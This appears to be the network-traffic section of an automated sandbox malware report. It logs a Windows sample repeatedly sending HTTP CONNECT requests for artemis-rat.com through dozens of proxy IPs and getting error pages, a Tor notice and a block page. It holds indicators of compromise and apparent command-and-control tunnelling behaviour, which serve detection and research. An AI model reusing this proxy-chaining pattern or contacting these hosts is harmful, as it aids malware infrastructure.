                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1756192.168.2.455245185.101.16.52807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.198815107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1757192.168.2.45248936.92.193.189807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.244708061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.306322098 CET818INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:37:30 GMT
                                              Server: Apache
                                              Vary: accept-language,accept-charset
                                              Accept-Ranges: bytes
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Content-Language: en
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 53 65 72 76 65 72 20 65 72 72 6f 72 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 69 6e 66 6f 40 72 73 68 62 2d 6c 61 6d 70 75 6e 67 2e 63 6f 2e 69 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 65 72 72 6f 72 21
                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Server error!</title><link rev="made" href="mailto:info@rshb-lampung.co.id" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>Server error!
                                              Mar 11, 2024 08:37:30.306329966 CET461INData Raw: 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 0d 0a 0d 0a 20 20 20 20 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 61 6e 64 20 77 61 73 20 0d 0a 20 20 20 20 75
                                              Data Ascii: </h1><p> The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there was an error in a CGI script. </p><p>If you think this is a server err


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1758192.168.2.454089137.184.182.145283577284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.245389938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.366471052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.366914034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:38.367095947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:50.366200924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:02.369436979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:14.381839037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1759192.168.2.455246114.55.84.12300017284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.246014118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.600274086 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1760192.168.2.45524983.243.92.15480807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.252816916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1761192.168.2.454064142.4.7.20397827284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.253027916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.366468906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.366944075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:38.367110968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:50.366693020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:02.371260881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:14.381879091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1762192.168.2.455247217.60.194.19831287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.314883947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1763192.168.2.4552485.202.104.2231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.333071947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1764192.168.2.455250103.63.190.7280807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.356190920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1765192.168.2.455070192.252.220.92173287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.362289906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1766192.168.2.45156551.158.77.220163797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.365827084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.857934952 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1767192.168.2.45525145.11.95.16560107284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.496768951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1768192.168.2.454161177.234.194.1729997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.523344040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.553942919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.282092094 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1769192.168.2.455197124.163.236.5473027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.526380062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1770192.168.2.454134178.128.207.96188777284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.636388063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1771192.168.2.454126185.161.186.92543217284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.637465000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1772192.168.2.455237184.170.249.6541457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.641763926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1773192.168.2.455252103.83.232.122807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.643759012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1774192.168.2.454431192.252.208.67142877284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.644253969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1775192.168.2.451870192.169.226.96433287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.644912004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.757107973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.848766088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:38.890824080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:51.053824902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:03.131838083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:15.131865025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
